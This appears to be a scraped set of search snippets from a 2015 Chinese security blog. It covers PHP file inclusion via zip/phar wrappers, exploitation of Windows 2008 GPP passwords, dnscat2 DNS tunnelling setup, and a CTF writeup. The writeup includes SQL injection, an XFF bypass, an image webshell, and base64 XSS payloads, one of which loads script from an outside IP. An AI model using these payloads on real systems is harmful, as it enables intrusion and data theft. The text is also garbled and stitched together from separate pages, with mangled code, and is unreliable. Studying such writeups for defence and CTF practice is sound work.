bl4ck.in
zip或phar协议包含文件 - Tomato's BL0G
http://bl4ck.in/index.php/tricks/use-zip-or-phar-to-include-file.html
本文由 Tomato 发表于 2015 年 06 月 10 日. Php $file = $ GET['file']; if(isset($file) & strtolower(substr($file, -4) = .jpg){ include($file); }? Php $file = $ GET['file']; include($file.'.jpg');? 但是 x00的截断在php 5.3.4就没用了,而且还要考虑GPC,所以是比较鸡肋的方法。 然后我们构造zip:/ php.zip#php.jpg. Http:/ 127.0.0.1/file.php? File=zip:/ php.zip%23php.jpg. Php $p = new PharData(dirname( FILE ).'/phartest2.zip', 0,'phartest2',Phar: ZIP) ; $x=file get contents('./php.php'); $p- addFromString('a.jpg', $x);? File=phar:/ php.zip/php.jpg.
bl4ck.in
windows2008 GPP漏洞利用 - Tomato's BL0G
http://bl4ck.in/index.php/penetration/windows2008-GPP-vulnerability.html
本文由 Tomato 发表于 2015 年 08 月 15 日. Windows7 普通域成员 windows2008 域控. Gpupdate & net user. Tomato-dc SYSVOL tomato.com Policies {31B2F340-016D-11D2-945F-00C04FB984F9} MACHINE Preferences Groups. Xml version=1.0 encoding=utf-8? Services Services.xml ScheduledTasks ScheduledTasks.xml Printers Printers.xml Drives Drives.xml DataSources DataSources.xml. July 30th, 2016 at 07:14 am. Via@ Tomato ][.]. 实战 通过DNS协议绕过防火墙 - 莹莹之色. Via@ Tomato ][.]. 强迫症- - new ActiveXObject(versio.
bl4ck.in
分类 penetration 下的文章 - Tomato's BL0G
http://bl4ck.in/index.php/category/penetration
Ubuntu 14.04 root用户 windows7 x64 user用户. Apt-get update apt-get -y install ruby-dev git make g gem install bundler git clone https:/ github.com/iagox86/dnscat2.git cd dnscat2/server #修改Gemfile source 'https:/ ruby.taobao.org/' bundle install. Apt-get install docker.io service docker status service docker start cd /dnscat2/server #修改Gemfile source 'https:/ ruby.taobao.org/' docker build . 安装完成之后,可能在docker images 看到这个镜像没有名字,我们修改一下 docker tag IMAGEID mpercival/dnscat2. 测试环境 CentOS 6.5 x64. Redis-cli -h 192&...
bl4ck.in
第三届-360信息安全大赛 writeup - Tomato's BL0G
http://bl4ck.in/index.php/writeup/2015-geekgame-writeup.html
本文由 Tomato 发表于 2015 年 06 月 11 日. Where is the key? 然后base64 decode之后,为emem. /ctf 360 flag 后面群里提示苹果电脑,然后访问. Http:/ isg.campus.360.cn/web1/ctf 360 flag/.DS Store. Http:/ isg.campus.360.cn/web2/check.php.swp. Php /* * 此处为提示 $code=0000000000; admin code 0 user code 1 test code 2 * */ len check($ GET['code'],10) if(! Empty($ GET['code']) { if(! Db- count('admin',email='{$ GET['email']}' ANDcode='{$ GET['code']}') die('error'); $ SESSION['email']= $ GET['email']; . }? Http:/ isg.campus.360.cn/web3/. Php eval(g...
bl4ck.in
关于狗,我 - Tomato's BL0G
http://bl4ck.in/index.php/AboutMe.html
June 11th, 2015 at 12:11 am. June 11th, 2015 at 12:12 am. June 22nd, 2015 at 10:07 pm. July 23rd, 2015 at 02:39 pm. 实战 通过DNS协议绕过防火墙 - 莹莹之色. Via@ Tomato ][.]. 强迫症- - new ActiveXObject(versio.
bl4ck.in
分类 tricks 下的文章 - Tomato's BL0G
http://bl4ck.in/index.php/category/tricks
Php $file = $ GET['file']; if(isset($file) & strtolower(substr($file, -4) = .jpg){ include($file); }? Php $file = $ GET['file']; include($file.'.jpg');? 但是 x00的截断在php 5.3.4就没用了,而且还要考虑GPC,所以是比较鸡肋的方法。 然后我们构造zip:/ php.zip#php.jpg. Http:/ 127.0.0.1/file.php? File=zip:/ php.zip%23php.jpg. Php $p = new PharData(dirname( FILE ).'/phartest2.zip', 0,'phartest2',Phar: ZIP) ; $x=file get contents('./php.php'); $p- addFromString('a.jpg', $x);? Http:/ 127.0.0.1/file.php? File=phar:/ php.zip/php.jpg.
bl4ck.in
分类 writeup 下的文章 - Tomato's BL0G
http://bl4ck.in/index.php/category/writeup
文件名','uid','uid'),( database() ,'uid','uid')#.jpg. 然后就可以登陆admin这个帐号,然后在manage页面提示 not allow ip 我们把xxf改为127.0.0.1就可以绕过。 然后要我们猜action 由于是filemanage就直接猜action upload 然后就出现一个上传页面,通过一轮fuzz,直接上传一个图片马,在后面写上. Script lanaguage=php phpinfo() /script. Link rel=import href=data:text/html;base64,PHNjcmlwdD5kZWxldGUgYWxlcnQ7YWxlcnQoIkhlbGxvIik7PC9zY3JpcHQ. Link rel=import href=data:text/html;base64,PHNjcmlwdCBzcmM9aHR0cDovLzE4MC43Ni4xNzguNTQ6ODAwNC80Yjc5ZjVkNDg2MDM4NGQ0YWM0OTRhZDkxZjUzMTNiNy9qcy9qcXVlcnkuanM PC9zY3Jpc...